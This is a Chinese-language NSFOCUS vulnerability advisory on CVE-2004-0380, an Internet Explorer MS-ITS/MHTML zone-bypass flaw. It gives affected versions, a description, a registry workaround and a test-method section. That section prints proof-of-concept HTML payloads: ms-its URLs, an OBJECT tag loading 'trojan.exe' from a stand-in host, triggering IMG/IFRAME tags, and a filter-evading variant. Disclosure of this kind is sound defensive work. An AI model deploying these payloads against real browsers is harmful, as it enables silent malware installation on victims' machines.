NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Microsoft Internet Explorer MT-ITS协议区域绕过漏洞

发布日期：2004-02-13
更新日期：2004-02-19

受影响系统：

Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server

描述：

BUGTRAQ ID: 9658
CVE(CAN) ID: CVE-2004-0380

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer在处理MS-ITS InfoTech协议URL处理时存在问题，远程攻击者可以利用这个漏洞构建恶意页面，诱使用户处理，以系统权限执行恶意代码。

此漏洞可利用MS-ITS InfoTech协议URI处理器触发，使用这个协议可迫使浏览器通过重定向一个不存在的MHTML文件（使用其他已知漏洞）转到本地电脑安全域，在这种情况下，包含的恶意内容将会以本地电脑权限执行，如恶意CHM文件。组合其他问题，攻击者构建恶意页面，诱使用户访问，可自动下载和执行任意程序。

根据报告这个漏洞已经被Trojan.Ibiza利用使用。

<*来源：Thor Larholm （Thor@jubii.dk）
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Thor Larholm （Thor@jubii.dk）提供了如下测试方法：

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

攻击者可以建立一个包含CLASSID的脚本如launch.html:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

攻击者然后利用其他脚本标记执行launch.html，如：
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

另外http-equiv和Jelmer提供不同的演示：

http://www.malware.com/junk-de-lux.html

http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Jelmer也发布了在字符串中使用编码的字符来绕过部分过滤器的演示代码：

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

建议：

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 更名下面的注册表条目：

HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its

不过如果使用其他名进行处理也会导致此漏洞的产生。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：4474
严重程度：10（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客